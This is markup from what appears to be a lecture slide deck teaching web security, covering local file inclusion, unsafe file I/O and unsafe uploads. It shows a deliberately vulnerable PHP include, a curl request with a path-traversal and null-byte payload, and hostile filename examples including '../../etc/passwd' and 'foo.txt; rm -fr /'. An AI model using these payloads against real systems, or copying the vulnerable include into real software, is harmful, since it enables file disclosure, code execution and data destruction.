            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948" name="Google Shape;948;p139"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="85206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Sensu Admin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2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 File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Google Shape;1471;p211"/>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Local File Inclusion is a vulnerability where an attacker controls data used to build a file path to a resource on a server that is eventually executed or read by the application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is distinct from directory traversal, where weak file system controls are exploited to access a file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212"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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 File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1477" name="Google Shape;1477;p212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="874350" y="1495026"/>
            <a:ext cx="7395300" cy="2489223"/>
            <a:chOff x="1050425" y="1495026"/>
            <a:chExt cx="7395300" cy="2489223"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1478" name="Google Shape;1478;p212"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1050425" y="2469549"/>
              <a:ext cx="7395300" cy="15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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>&lt;?php</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   if ( isset( $_GET['language'] ) ) {</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      include( $_GET['language'] . '.php' );</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   }</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?&gt;</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1479" name="Google Shape;1479;p212"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1050425" y="1495026"/>
              <a:ext cx="73953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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>$ curl https://example.com/login.php?language=french</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>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213"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="3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 File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1485" name="Google Shape;1485;p213"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="246800" y="1312974"/>
            <a:ext cx="8796300" cy="2418644"/>
            <a:chOff x="330800" y="1406072"/>
            <a:chExt cx="8796300" cy="1982658"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1486" name="Google Shape;1486;p213"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="958350" y="2380429"/>
              <a:ext cx="7395300" cy="10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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>&lt;?php</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   if ( isset( $_GET['language'] ) ) {</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      include( $_GET['language'] . '.php' );</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   }</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?&gt;</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1487" name="Google Shape;1487;p213"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="330800" y="1406072"/>
              <a:ext cx="8796300" cy="6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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>$ curl</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>https://example.com/login.php?language=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E06666"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>../../../../admin_interface.php%00</a:t>
              </a:r>
              <a:endParaRPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>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214"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="39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 File Inclusion</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1493" name="Google Shape;1493;p214"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="246750" y="1312974"/>
            <a:ext cx="8796350" cy="2418651"/>
            <a:chOff x="330750" y="1406072"/>
            <a:chExt cx="8796350" cy="1982664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1494" name="Google Shape;1494;p214"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="330750" y="2380435"/>
              <a:ext cx="8796300" cy="10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Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>&lt;?php</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   if ( isset( $_GET['language'] ) ) {</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      include( $_GET[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E06666"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>../../../../admin_interface.php%00</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>] . '.php' );</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   }</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en" sz="1800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>?&gt;</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1495" name="Google Shape;1495;p214"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="330800" y="1406072"/>
              <a:ext cx="8796300" cy="6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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>$ curl</a:t>
              </a:r>
              <a:endParaRPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>https://example.com/login.php?language=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E06666"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New"/>
                  <a:ea typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                  <a:sym typeface="Courier New"/>
                </a:rPr>
                <a:t>../../../../admin_interface.php%00</a:t>
              </a:r>
              <a:endParaRPr sz="1500" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>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215"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3866700" cy="9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Local File Inclusion Impact</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1501" name="Google Shape;1501;p215"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="5638" t="14145" r="30209" b="18654"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4692125" y="1699250"/>
            <a:ext cx="4297875" cy="2532701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1502" name="Google Shape;1502;p215"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205450" y="1457575"/>
            <a:ext cx="4359900" cy="2787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FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code execution</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>allows attackers to specify PHP files to execute </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>JavaServer Pages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>@include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>, allows attackers to set JSP files to execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read arbitrary files from server</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Allowing users to control file path parameters can return data that should not otherwise be accessible</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1">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pic>
        <p:nvPicPr>
          <p:cNvPr id="1507" name="Google Shape;1507;p216"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2903438" y="175786"/>
            <a:ext cx="3337125" cy="47919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217"/>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Unsafe File I/O</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218"/>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Unsafe File I/O?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1518" name="Google Shape;1518;p218"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288150" y="2015175"/>
            <a:ext cx="8148300" cy="16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Unsafe file I/O occurs when file uploads are not validated and restricted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> An attacker uploads a PHP script instead of an image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Unsafe file I/O occurs when file downloads are controlled by the attacker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Can inject malicious macros into Excel documents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can distribute traditional malware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2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Unsafe Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1524" name="Google Shape;1524;p219"/>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Occurs when a user is able to upload malicious files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An attacker uploads a PHP script instead of a user profile picture. If the file is stored in the webroot (or any executable directory), then browsing to the file will execute it</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An image file contains an exploit payload designed to exploit backend tools</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nothing from the client can be trusted</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Filename:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Can be set to anything, including “../../etc/passwd”, “foo.txt; rm -fr /”, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Can be set to anything. “image/png” doesn’t mean the file is a PNG</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
